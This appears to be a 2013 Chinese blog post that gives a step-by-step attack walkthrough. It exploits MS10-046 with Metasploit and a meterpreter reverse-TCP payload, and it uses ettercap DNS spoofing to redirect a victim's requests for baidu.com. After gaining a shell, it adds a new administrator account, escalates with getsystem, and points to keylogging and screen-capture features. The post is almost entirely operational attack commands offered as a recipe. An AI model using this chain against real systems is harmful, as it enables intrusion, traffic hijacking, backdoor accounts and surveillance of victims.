ms10_046_shortcut_icon_dllloader漏洞利用和ettercap dns欺骗

ms10_046_shortcut_icon_dllloader漏洞利用过程

  1. msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
  2. msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
  3. msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.107
  4. msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.107
  5. msf exploit(ms10_046_shortcut_icon_dllloader) > show options
  6. msf exploit(ms10_046_shortcut_icon_dllloader) > exploit

ettercap dns欺骗

  1. root@bt:~# cd /usr/local/share/ettercap/
  2. root@bt:/usr/local/share/ettercap# vim etter.dns        //在最后一行添加需要欺骗的域名,如下图

  3. root@bt:/usr/local/share/ettercap# ettercap -T -q -i eth0 -P dns_spoof /192.168.1.102/ //        //开始dns欺骗

利用结果显示

  1. 清空受害机器dns缓存:

  2. 受害主机访问www.baidu.com

  3. Ettcap终端显示:

  4. 漏洞利用终端显示:

     

漏洞利用成功,开始利用

  1. msf exploit(ms10_046_shortcut_icon_dllloader) > sessions        //在漏洞利用终端输入,可以看到建立的会话
  2. msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1        //进入会话

     

  3. meterpreter > shell        //进入cmd shell

     

  4. 拿到cmd shell后就可以对受害主机进行基本控制。如:

    net user newuser password /add        //添加用户

    net localgroup administrators newuser /add        //增加权限

    exit        //退出cmd,返回会话

  5. meterpreter > ps        //列出受害主机进程

     

  6. meterpreter > getuid        //查看我当前拥有的权限

  7. meterpreter > getsystem        //提权

  8. meterpreter > help        //查看其他命令,可以键盘捕获,截屏等等其他强大功能

posted on 2013-12-03 01:19  寻步  阅读(1497)  评论(0编辑  收藏  举报